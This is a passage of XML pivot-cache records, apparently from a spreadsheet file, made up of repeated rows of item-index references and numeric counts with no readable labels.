  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="10"/>
    <x v="676"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="31"/>
    <x v="676"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="6"/>
    <x v="676"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="1"/>
    <x v="676"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="1"/>
    <x v="676"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="91"/>
    <x v="676"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="41"/>
    <x v="676"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="676"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="676"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="677"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="677"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="677"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="677"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="25"/>
    <x v="677"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="12"/>
    <x v="677"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="3"/>
    <x v="677"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="7"/>
    <x v="677"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="677"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="677"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="677"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="677"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="0"/>
    <x v="677"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="677"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="678"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="678"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="678"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="678"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="678"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="678"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="1"/>
    <x v="678"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="1"/>
    <x v="678"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="678"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="678"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="7"/>
    <x v="678"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="13"/>
    <x v="678"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="678"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="678"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="679"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="679"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="1"/>
    <x v="679"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="1"/>
    <x v="679"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="679"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="679"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="2"/>
    <x v="679"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="2"/>
    <x v="679"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="1"/>
    <x v="679"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="1"/>
    <x v="679"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="1"/>
    <x v="679"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="1"/>
    <x v="679"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="7"/>
    <x v="679"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="2"/>
    <x v="679"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="680"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="680"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="680"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="680"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="680"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="680"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="680"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="680"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="680"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="680"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="680"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="680"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="0"/>
    <x v="680"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="680"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="3"/>
    <x v="680"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="2"/>
    <x v="680"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="1"/>
    <x v="680"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="10"/>
    <x v="680"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="24"/>
    <x v="680"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="681"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="681"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="681"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="681"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="5"/>
    <x v="681"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="681"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="1"/>
    <x v="681"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="681"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="681"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="681"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="8"/>
    <x v="681"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="681"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="6"/>
    <x v="681"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="681"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="682"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="682"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="682"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="682"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="4"/>
    <x v="682"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="682"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="4"/>
    <x v="682"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="1"/>
    <x v="682"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="2"/>
    <x v="682"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="1"/>
    <x v="682"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="2"/>
    <x v="682"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="1"/>
    <x v="682"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="6"/>
    <x v="682"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="682"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="683"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="683"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="683"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="683"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="5"/>
    <x v="683"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="3"/>
    <x v="683"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="40"/>
    <x v="683"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="683"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="3"/>
    <x v="683"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="13"/>
    <x v="683"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="240"/>
    <x v="683"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="3"/>
    <x v="683"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="683"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="3"/>
    <x v="683"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="684"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="684"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="684"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="684"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="684"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="684"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="7"/>
    <x v="684"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="684"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="684"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="684"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="6"/>
    <x v="684"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="7"/>
    <x v="684"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="684"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="684"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="115"/>
    <x v="30"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="34"/>
    <x v="30"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="685"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="685"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="685"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="685"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="685"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="685"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="4"/>
    <x v="685"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="685"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="5"/>
    <x v="685"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="685"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="685"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="685"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="685"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="685"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="6"/>
    <x v="685"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="685"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="1"/>
    <x v="686"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="686"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="3"/>
    <x v="686"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="686"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="13"/>
    <x v="686"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="7"/>
    <x v="686"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="27"/>
    <x v="686"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="45"/>
    <x v="686"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="686"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="686"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="25"/>
    <x v="686"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="25"/>
    <x v="686"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="686"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="2"/>
    <x v="686"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="687"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="687"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="687"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="687"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="687"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="687"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="3"/>
    <x v="687"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="687"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="687"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="687"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="2"/>
    <x v="687"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="687"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="687"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="687"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="688"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="688"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="688"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="688"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="688"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="688"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="8"/>
    <x v="688"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="688"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="688"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="688"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="688"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="688"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="31"/>
    <x v="688"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="688"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="689"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="689"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="689"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="689"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="689"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="689"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="1"/>
    <x v="689"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="2"/>
    <x v="689"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="689"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="689"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="689"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="689"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="6"/>
    <x v="689"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="689"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="1"/>
    <x v="690"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="690"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="4"/>
    <x v="690"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="690"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="690"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="690"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="4"/>
    <x v="690"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="690"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="690"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="690"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="690"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="690"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="22"/>
    <x v="690"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="690"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="691"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="691"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="691"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="691"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="691"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="691"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="3"/>
    <x v="691"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="2"/>
    <x v="691"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="691"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="691"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="10"/>
    <x v="691"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="10"/>
    <x v="691"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="22"/>
    <x v="691"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="2"/>
    <x v="691"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="692"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="692"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="692"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="692"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="692"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="692"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="1"/>
    <x v="692"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="1"/>
    <x v="692"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="692"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="692"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="692"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="2"/>
    <x v="692"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="692"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="692"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="692"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="693"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="693"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="1"/>
    <x v="693"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="1"/>
    <x v="693"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="693"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="8"/>
    <x v="693"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="693"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="693"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="693"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="693"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="693"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="693"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="0"/>
    <x v="693"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="693"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="694"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="694"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="694"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="694"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="694"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="694"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="2"/>
    <x v="694"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="2"/>
    <x v="694"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="15"/>
    <x v="694"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="694"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="694"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="694"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="0"/>
    <x v="694"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="694"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="695"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="695"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="695"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="695"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="695"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="695"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="10"/>
    <x v="695"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="20"/>
    <x v="695"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="695"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="2"/>
    <x v="695"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="19"/>
    <x v="695"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="28"/>
    <x v="695"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="6"/>
    <x v="695"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="695"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="696"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="696"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="696"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="696"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="696"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="696"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="3"/>
    <x v="696"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="3"/>
    <x v="696"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="696"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="696"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="10"/>
    <x v="696"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="10"/>
    <x v="696"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="22"/>
    <x v="696"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="696"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="697"/>
